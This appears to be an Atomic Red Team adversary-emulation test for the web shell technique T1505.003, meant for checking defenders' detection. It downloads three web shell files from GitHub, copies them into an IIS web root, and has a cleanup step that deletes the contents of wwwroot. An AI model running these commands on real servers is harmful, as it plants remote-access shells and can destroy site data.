#TechniqueName: Server Software Component: Web Shell
#AtomicTestName: Web Shell Written to Disk
#Language: cmd

#get_prereq_commands
New-Item -Type Directory (split-path PathToAtomicsFolder\T1505.003\src\) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "PathToAtomicsFolder\T1505.003\src\/b.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "PathToAtomicsFolder\T1505.003\src\/test.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "PathToAtomicsFolder\T1505.003\src\/cmd.aspx"


#prereq_commands
if (Test-Path PathToAtomicsFolder\T1505.003\src\) {exit 0} else {exit 1}


#commands
xcopy PathToAtomicsFolder\T1505.003\src\ C:\inetpub\wwwroot


#cleanup_commands
del C:\inetpub\wwwroot /q >nul 2>&1

